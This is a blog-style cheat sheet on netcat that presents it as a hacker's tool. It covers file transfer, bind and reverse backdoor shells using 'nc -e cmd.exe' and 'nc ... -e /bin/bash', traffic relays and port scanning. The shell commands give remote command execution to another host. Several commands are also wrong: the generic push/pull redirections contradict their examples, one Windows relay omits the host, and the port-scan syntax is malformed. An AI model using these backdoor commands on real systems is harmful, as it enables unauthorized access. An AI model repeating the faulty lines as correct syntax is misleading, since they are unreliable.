web analytics

Netcat – The Hacker’s Swiss Army Knife

Netcat is a tool that can read and write TCP and UDP ports. This tool may not strike you as impressive but its simple and effective nature has made it so ubiquitous that it has been known as the Hacker’s Swiss Army Knife. It is regularly used to connect to a target service, port scan, transfer files, or even port forward for tunneling. Using deliberate netcat connections can enumerate a target much like nmap. Learn and practice this tool if you plan on being capable in this domain.

Basics

Netcat Client: nc [TargetIPaddress] [TargetPort] #Connect to target IP address on the specified port
Example: nc 10.0.0.10 25.

Netcat Listener: nc -lp [LocalPort] #Establish a listener on an arbitrary local port
Example: nc -lp 7777

Flags

  • -l – Listen mode
  • -L – Persistent listener will continue listening after connection severs (windows only)
  • -p – Local port
  • -n – Prevent DNS lookup
  • -v – Verbose mode (also -vv for more verbose)
  • -e – Execute program upon connection
  • -u – UDP mode
  • -z – Zero-I/O mode will not receive any data from server (useful in port scanning)
  • -wN – Netcat only runs for N seconds

File Transfers

Client to Listener (push)
 Listener: nc -lp [LocalPort] < [file]
 Client: nc [TargetIPaddress] [TargetPort] > [file]
Example:
 Listener: nc -lp 7777 > evil.exe
 Client: nc 10.0.0.14 7777 < evil.exe

Listener to Client (pull)
 Listener: nc -lp [LocalPort] > [file]
 Client: nc [TargetIPaddress] [TargetPort] < [file]
Example:
 Listener: nc -lp 7777 < evil.exe
 Client: nc 10.0.0.14 7777 > evil.exe

Shells

Listening backdoor
 Listener: nc -lp [LocalPort] -e cmd.exe
 Client: nc [TargetIPaddress] [TargetPort]
Example:
 Listener: nc -lp 7777 -e cmd.exe
 Client: nc 10.0.0.14 7777

Reverse backdoor
 Listener: nc -lp [LocalPort]
 Client: nc [TargetIPaddress] [TargetPort] -e /bin/bash
Example:
 Listener: nc -lp 7777
 Client: nc 10.0.0.14 7777 -e /bin/bash
**/bin/bash provides the shell access for linux systems while cmd.exe is for windows systems

Relays

Linux – Listener to Client:
 Relay: cd /tmp
 Relay: mknod backpipe p
 Relay: nc -lp [LocalPort] 0< backpipe | nc [TargetIPAddress] [TargetPort] | tee backpipe
 Connecter:nc [TargetIPAddress] [TargetPort]
Example:
 Relay(10.0.0.14): nc -lp 23 0< backpipe | nc 10.0.0.55 23 | tee backpipe
 Connector: nc 10.0.0.14 23
**This will forward all traffic the connector sends to the relay (10.0.0.14) on port 23 to the target (10.0.0.55) on it’s port 23

Linux – Listener to Listener:
 Relay: cd /tmp
 Relay: mknod backpipe p
 Relay: nc -lp [LocalPort-1] 0< backpipe | nc -lp [LocalPort-2] | tee backpipe
 Connecter1:nc [TargetIPAddress] [TargetPort-1]
 Connecter2:nc [TargetIPAddress] [TargetPort-2]
Example:
 Relay(10.0.0.14): nc -lp 7777 0< backpipe | nc -lp 7779 | tee backpipe
 Connector1: nc 10.0.0.14 7777
 Connector2: nc 10.0.0.14 7779
**This will forward all traffic between the connectors through the relay(10.0.0.14)

Windows – Listener to Client:
 Relay: cd c:\temp
 Relay: echo nc [TargetIPaddress] [TargetPort] > forward.bat
 Relay: nc -lp [LocalPort] -e forward.bat
 Connecter:nc [TargetIPAddress] [TargetPort]
Example:
 Relay(10.0.0.14): echo nc 10.0.0.55 23 > forward.bat
 Relay(10.0.0.14): nc -lp 23 -e forward.bat
 Connector: nc 10.0.0.14 23
**This will forward all traffic the connector sends to the relay (10.0.0.14) on port 23 to the target (10.0.0.55) on it’s port 23

Windows – Listener to Listener:
 Relay: cd c:\temp
 Relay: echo nc [LocalPort-2] > forward.bat
 Relay: nc -lp [LocalPort-1] -e forward.bat
 Connecter:nc [TargetIPAddress] [TargetPort]
Example:
 Relay(10.0.0.14): echo nc 7779 > forward.bat
 Relay(10.0.0.14): nc -lp 7777 -e forward.bat
 Connector12: nc 10.0.0.14 7777
 Connector: nc 10.0.0.14 7779
**This will forward all traffic between the connectors through the relay(10.0.0.14)

Port Scanning

Host: nc -nvzw1 [TargetIPAddress] [StartPort]-[EndPort] 2> > (grep -v refused)
Example:
Host:nc -nvzw1 10.0.0.14 1-1023 2> > (grep -v refused)

Tags: File Transfer, Hacking, Netcat, Port Forwarding, Port Scanning, Relays, Shells, Tunneling

Related Posts

Previous Post Next Post

Leave a Reply

Your email address will not be published.

0 shares